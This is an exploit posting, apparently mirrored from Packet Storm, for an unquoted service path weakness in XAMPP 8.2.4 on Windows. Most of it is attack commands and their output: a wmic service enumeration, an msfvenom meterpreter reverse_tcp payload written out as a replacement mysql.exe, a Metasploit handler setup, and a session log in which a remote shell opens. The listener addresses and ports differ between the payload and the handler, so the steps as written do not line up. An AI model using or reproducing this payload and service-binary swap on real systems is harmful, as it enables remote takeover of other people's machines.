Share
## https://sploitus.com/exploit?id=PACKETSTORM:173410
# Exploit Title: XAMPP 8.2.4 - Unquoted Path  
# Date: 07/2023  
# Exploit Author: Andrey Stoykov  
# Version: 8.2.4  
# Software Link:  
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe  
# Tested on: Windows Server 2022  
# Blog: http://msecureltd.blogspot.com/  
  
  
Steps to Exploit:  
  
1. Search for unquoted paths  
2. Generate meterpreter shell  
3. Copy shell to XAMPP directory replacing "mysql.exe"  
4. Exploit by double clicking on shell  
  
  
C:\Users\astoykov>wmic service get name,displayname,pathname,startmode  
|findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """  
  
mysql  
mysql  
C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini  
mysql Auto  
  
  
  
// Generate shell  
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444  
-f exe -o mysql.exe  
  
  
// Setup listener  
msf6 > use exploit/multi/handler  
msf6 exploit(multi/handler) > set lhost 192.168.1.13  
msf6 exploit(multi/handler) > set lport 4443  
msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp  
msf6 exploit(multi/handler) > run  
  
  
msf6 exploit(multi/handler) > run  
  
[*] Started reverse TCP handler on 192.168.1.13:4443  
[*] Sending stage (175686 bytes) to 192.168.1.11  
[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686)  
at 2023-07-08 03:59:40 -0700  
  
  
meterpreter > getuid  
Server username: WIN-5PT4K404NLO\astoykov  
meterpreter > getpid  
Current pid: 4724  
meterpreter > shell  
Process 5884 created.  
Channel 1 created.  
Microsoft Windows [Version 10.0.20348.1]  
(c) Microsoft Corporation. All rights reserved.  
[...]  
C:\xampp\mysql\bin>dir  
dir  
Volume in drive C has no label.  
Volume Serial Number is 80B5-B405  
  
Directory of C:\xampp\mysql\bin  
[...]